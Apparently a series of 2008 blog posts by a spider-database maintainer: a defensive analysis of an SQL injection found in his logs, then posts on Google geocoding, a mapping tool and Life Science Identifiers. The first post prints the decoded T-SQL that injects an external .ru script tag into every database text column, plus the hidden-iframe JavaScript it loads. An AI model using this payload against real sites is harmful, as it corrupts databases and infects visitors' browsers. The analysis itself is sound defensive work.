
/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that could be executed on the server. Had I constructed my SQL on the page to be something like:

SELECT * FROM [TABLE] WHERE [COLUMN] = "" & [LETTER F] & ""

...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:

SELECT * FROM [TABLE] WHERE [COLUMN] = "F"

...the executed SQL would have been:

SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Cool.

So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. The full decoded HEX is as follows:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnrc.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Hmm. What does this mean? Well, it's an attempt to do something very scary - update every cell in every table to include a reference to a snippet of JavaScript. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.

So, what's in the JavaScript? This:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that loads with the rendering of the page. This is as far as I got. But, others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected with this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.

But, I have still not idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?

Google Geocodes

2008-07-19T12:57:00.003-06:00

Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Map API and discovered plenty of new great things. For example, folks have developed reverse geocoders. It's a shame however that the full ISO country names aren't used. Rather, only the country codes are made available via Google's geocode API. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Map API parlance) because I could then use this in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like Specify could have taken advantage of this to help users clean or check their data as these are entered.

Nevertheless, I tweaked my old Google Map Geocoder to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of GPS units and iPhones, this may be rather pointless. But it was fun to see what I could do in an hour or so.

Simple Mapper

2008-07-18T09:14:00.004-06:00

With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black & white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right HERE.

I know, I know, yet another mapping service. But, this one serves a very specific purpose. It could no doubt be expanded and made more customizable such as different points for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start to producing something that hopefully satisfies a very different need.

Life Science Identifiers (LSIDs) - Why?

2008-05-12T05:09:00.007-06:00

The Catalogue of Life (CoLP) recently released its 2008 checklist and has now implemented Life Science Identifiers (LSIDs). In the past, the Catalogue of Life changed its identifiers with every new version, thus forcing database owners who made use of CoLP names and identifiers to reconstruct their databases if they wished to maintain some sort of external linking to an authoritative source.

If you're not familiar with LSIDs, this from the sourceforge LSID resolution project:

Life Science Identifiers (LSIDs) are persistent, location-independent, resource identifiers for uniquely naming biologically significant resources including species names, concepts, occurrences, genes or proteins, or data objects that encode information about them. To put it simply, LSIDs are a way to identify and locate pieces of biological information on the web.

This is how LSIDs are constructed:

So, what can one do with an LSID? Well, given an LSID, one can get some metadata for that data object. This assumes of course that the authority at the other end is alive and ready to serve the metatdata. There is not a central authority as is the case with Digital Object Identifiers (DOIs) used by the publication industry.

For starters, one can resolve LSIDs using various online resources. Examples:

Biodiversity Information Standards (TWDG): LSID resolver

Rod Page: LSID tester

Because of the distributed nature of LSID authorities (its ultimately based on DNS), there is of course nothing preventing the same taxon name from having multiple identifiers or one authority from serving multiple LSIDs for the same taxon name. For example, the namestring for the fishing spider Dolomedes tenebrosus Hentz, 1844 has no less than 3 LSIDs that resolve to three different authorities:

uBio: urn:lsid:ubio.org:namebank:2072956
Catalogue of Life 2008: urn:lsid:catalogueoflife.org:taxon:f3b7cf14-29c1-102b-9a4a-00304854f820:ac2008 (ugh!)
The World Spider Catalog: urn:lsid:amnh.org:spidersp:019664

The uBio and the Catalogue of Life LSIDs for this spider resolve, but the AMNH LSID is nothing more than a pointer at this stage because at the time of writing does not yet have a functioning resolution service.

Which LSID is a database owner supposed to use? Are LSIDs meant to be currencies that either crumble or presist under Darwinian market pressures? What I want to do is store an LSID in my relational database such that I can more confidently link names with other sources of information such as information about the type specimens, gene sequences, synonyms, specimens etc. The uBio LSID above is nice and compact, but no one but me and uBio would use it. Norm Platnick wasn't aware that uBio had LSIDs for spider names! The World Spider Catalog LSID above is also nice and compact, but it doesn't resolve. The Catalogue of Life LSID is downright awful because I can't merely use the object identification as a stand-alone integer.

So, I'll continue to use "Dolomedes tenebrosus Hentz, 1844" thank you very much. A decentralized identifer system is failing me.